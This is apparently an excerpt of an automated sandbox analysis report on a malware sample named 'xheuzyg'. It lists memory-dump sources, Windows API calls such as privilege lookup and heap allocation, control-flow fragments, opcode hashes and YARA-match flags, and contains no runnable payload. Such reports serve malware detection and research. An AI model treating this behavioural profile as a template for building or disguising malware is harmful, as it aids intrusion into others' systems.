                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: f9aa4e0d031b1add26ac435d9bf66b80b0c5af53dd7a31005178eca867fe5384
                                                                                                                                                                  • Instruction ID: b3c95b652971c550d844ffedf07341ba9888aef4e832a9abb7ceb07595d23dfd
                                                                                                                                                                  • Opcode Fuzzy Hash: f9aa4e0d031b1add26ac435d9bf66b80b0c5af53dd7a31005178eca867fe5384
                                                                                                                                                                  • Instruction Fuzzy Hash: 4990023224148803D1107558880474B100997D1301F5DC411A8424758EC79589917221
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 42621fb00b53f73ec6a3f8054c53c8952bcd1e2cfab2b8182ff06b7b934c81cb
                                                                                                                                                                  • Instruction ID: f527a65cef32d5a03bd24e348d59c17a5f75ad9a6c6fd5389b46ef4775ec22c7
                                                                                                                                                                  • Opcode Fuzzy Hash: 42621fb00b53f73ec6a3f8054c53c8952bcd1e2cfab2b8182ff06b7b934c81cb
                                                                                                                                                                  • Instruction Fuzzy Hash: DC90023224140403D10079985808647100997E1301F59D011A9024655FC76589916231
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: dc9252fbff943c6c1c8a6733483737755879bd88637affe8f05a9cb8e41dc295
                                                                                                                                                                  • Instruction ID: e21d79855a46875b1d87a94b8491b30daa5a3825c019653a9997ca0ad9d71958
                                                                                                                                                                  • Opcode Fuzzy Hash: dc9252fbff943c6c1c8a6733483737755879bd88637affe8f05a9cb8e41dc295
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B90026238140443D10075584814B071009D7E2301F59C015E5064654EC719CD526226
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 452224992f5ce840715d346d0c524b02169f87596983d5ddc04a9559cb8e6351
                                                                                                                                                                  • Instruction ID: 7cbebe112fec2ec145f909fe72e360eff31e2882b34c7622b71710ddddf42f8e
                                                                                                                                                                  • Opcode Fuzzy Hash: 452224992f5ce840715d346d0c524b02169f87596983d5ddc04a9559cb8e6351
                                                                                                                                                                  • Instruction Fuzzy Hash: 88900222251C0043D20079684C14B07100997D1303F59C115A4154654DCA1589615621
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 295ae26f9054fa110f7f9b2a66a11889111e5173965cc6c1c9a2a952c0362d06
                                                                                                                                                                  • Instruction ID: 59c96e3eca09673613f5e6e29a4be2fbafe05b5cd7561096641908a7aa111efd
                                                                                                                                                                  • Opcode Fuzzy Hash: 295ae26f9054fa110f7f9b2a66a11889111e5173965cc6c1c9a2a952c0362d06
                                                                                                                                                                  • Instruction Fuzzy Hash: 5590022264140043414075688C449075009BBE2211759C121A4998650EC65989655765
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: c9365b7d1483057c948edb245bf4a2062fbfd5b9a43770ade9861d34ffefdc03
                                                                                                                                                                  • Instruction ID: e68e98991a6cb8e10e815be46482bedd9f77cb8032fe7f6d39f015efa829dd24
                                                                                                                                                                  • Opcode Fuzzy Hash: c9365b7d1483057c948edb245bf4a2062fbfd5b9a43770ade9861d34ffefdc03
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B90023224180403D10075584C1470B100997D1302F59C011A5164655EC72589516671
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: ca0c3518a79c8fce2b99b9eff719a3e3137dd46682e4bffaefc21d66c9c97664
                                                                                                                                                                  • Instruction ID: 2bb6ec7419c100c8098e4d751a50803d846bdb680b651bdc4038b85f6414519b
                                                                                                                                                                  • Opcode Fuzzy Hash: ca0c3518a79c8fce2b99b9eff719a3e3137dd46682e4bffaefc21d66c9c97664
                                                                                                                                                                  • Instruction Fuzzy Hash: D390027224140403D14075584804747100997D1301F59C011A9064654FC7598ED56765
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: f879cc00cfa0edfbc27543e8983998a531abe758db353200517f9f59b049f00f
                                                                                                                                                                  • Instruction ID: 514aafae257bfcdd6424b5ad0bbf40522370f25934480a7b72dcb95d56972a7c
                                                                                                                                                                  • Opcode Fuzzy Hash: f879cc00cfa0edfbc27543e8983998a531abe758db353200517f9f59b049f00f
                                                                                                                                                                  • Instruction Fuzzy Hash: E790022264140503D10175584804617100E97D1241F99C022A5024655FCB258A92A231
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                                                                                                                                  • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                                                                                                                                                  • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                                                                                                                                  • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 22 41a620-41a651 call 41af50 RtlAllocateHeap
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID: &EA
                                                                                                                                                                  • API String ID: 1279760036-1330915590
                                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                  • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                  • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 220 408310-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 229 40835c-40836e PostThreadMessageW 220->229 230 40838e-408392 220->230 231 408370-40838a call 40a470 229->231 232 40838d 229->232 231->232 232->230
                                                                                                                                                                  APIs
                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                  • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                                                                                                                                  • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                                                                                                                                                  • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                                                                                                                                  • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 264 41a7b1-41a7d9 265 41a7df-41a7f4 LookupPrivilegeValueW 264->265 266 41a7da call 41af50 264->266 266->265
                                                                                                                                                                  APIs
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                  • Opcode ID: 2b9bf8f93eddba59b05a6a829bc65b40f5e2cc8dd0454a75e151dfa1d687b677
                                                                                                                                                                  • Instruction ID: b9f6e69f6ee2d233c52f29172ec980d6ff0bd841a575121203ba4c3abe21ff4c
                                                                                                                                                                  • Opcode Fuzzy Hash: 2b9bf8f93eddba59b05a6a829bc65b40f5e2cc8dd0454a75e151dfa1d687b677
                                                                                                                                                                  • Instruction Fuzzy Hash: CCE0EDB26002086BD620DF99CC40EE737ACAF44760F018254FE1C9B381C530E9408BF5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 267 41a652-41a677 call 41af50 269 41a67c-41a691 RtlFreeHeap 267->269
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                  • Opcode ID: 1a88053897881c3b828ccecd3321ef29399b306a464667d37a72ee4e810d1203
                                                                                                                                                                  • Instruction ID: ff17b7a846088bdd27e4276fcf15dd02f3cae24546da19d763bd9d7f74a90aab
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a88053897881c3b828ccecd3321ef29399b306a464667d37a72ee4e810d1203
                                                                                                                                                                  • Instruction Fuzzy Hash: 8CE06DB1240204AFDB18DFA5CC85EEB7B6CEF89324F048559FD1C9B251C631E815CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 270 41a660-41a676 271 41a67c-41a691 RtlFreeHeap 270->271 272 41a677 call 41af50 270->272 272->271
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                  • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                                                                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                  • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                  • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                                                                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                  • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                  • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                                                                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                  • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: c5d29ccc847e62f1fde696a3df2776e3df3ca36f46131630708a32b28ef3cba2
                                                                                                                                                                  • Instruction ID: ffae6d14378fd1c2e6e9be507986daf71ac3c150b3499fcca4e34bbef54edc59
                                                                                                                                                                  • Opcode Fuzzy Hash: c5d29ccc847e62f1fde696a3df2776e3df3ca36f46131630708a32b28ef3cba2
                                                                                                                                                                  • Instruction Fuzzy Hash: 49B09B729415C5C6DA56E7644E0C71779047BD1701F19C065D2030795F8738C1D1E275
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
                                                                                                                                                                    • Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,FFFFFFFF,000000FF), ref: 001BB422
                                                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,001B96C1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001C46CE
                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001B96C1,?,?,?,00000055,?,-00000050,?,?), ref: 001C4705
                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 001C4799
                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 001C47A7
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001C4868
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                  • API String ID: 4147378913-905460609
                                                                                                                                                                  • Opcode ID: 0484e0acc7b968ae55a25f447ddf8d8c28a13375b284a2c6fd98ab7be32f7327
                                                                                                                                                                  • Instruction ID: 3ca7cc7612a48fa441ff2a2edc9f9ba9b83d50b93bb95deff0bdf729e83ae363
                                                                                                                                                                  • Opcode Fuzzy Hash: 0484e0acc7b968ae55a25f447ddf8d8c28a13375b284a2c6fd98ab7be32f7327
                                                                                                                                                                  • Instruction Fuzzy Hash: 13712671A08316ABEB24AB74DC96FBA77A8EF36700F10002EF905D7581EB70E8408765
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,001C50BA,00000002,00000000,?,?,?,001C50BA,?,00000000), ref: 001C4E41
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,001C50BA,00000002,00000000,?,?,?,001C50BA,?,00000000), ref: 001C4E6A
                                                                                                                                                                  • GetACP.KERNEL32(?,?,001C50BA,?,00000000), ref: 001C4E7F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                  • Opcode ID: 929e0652f73ebd67f3914d6491f44782e13b1cb4cc8c650e8a4ba87d22aa2cb7
                                                                                                                                                                  • Instruction ID: 372c589dae2ca2b249808fadc79c536c7dc7af20cb88cb604923d92b30488d34
                                                                                                                                                                  • Opcode Fuzzy Hash: 929e0652f73ebd67f3914d6491f44782e13b1cb4cc8c650e8a4ba87d22aa2cb7
                                                                                                                                                                  • Instruction Fuzzy Hash: 8021A132608100ABEB359F95C910FA773AABF74B64B57852CE90AD7100F736DD40C350
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
                                                                                                                                                                    • Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,FFFFFFFF,000000FF), ref: 001BB422
                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001C508C
                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 001C50CA
                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 001C50DD
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001C5125
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001C5140
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 415426439-0
                                                                                                                                                                  • Opcode ID: 7d5bda936a99aa52d79e580cf21fcd2ec8b0bf15d24a6d36dfafdcf4801ac31c
                                                                                                                                                                  • Instruction ID: 3457eff7ff3d6594573aa57ba62f1ba06467932f9225949b564e12e7be191145
                                                                                                                                                                  • Opcode Fuzzy Hash: 7d5bda936a99aa52d79e580cf21fcd2ec8b0bf15d24a6d36dfafdcf4801ac31c
                                                                                                                                                                  • Instruction Fuzzy Hash: 81516C71A04609ABDB10DBA5CC85FAF77B9FF28700F58046DF901E7191DB70E9948BA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: =$www.$www.
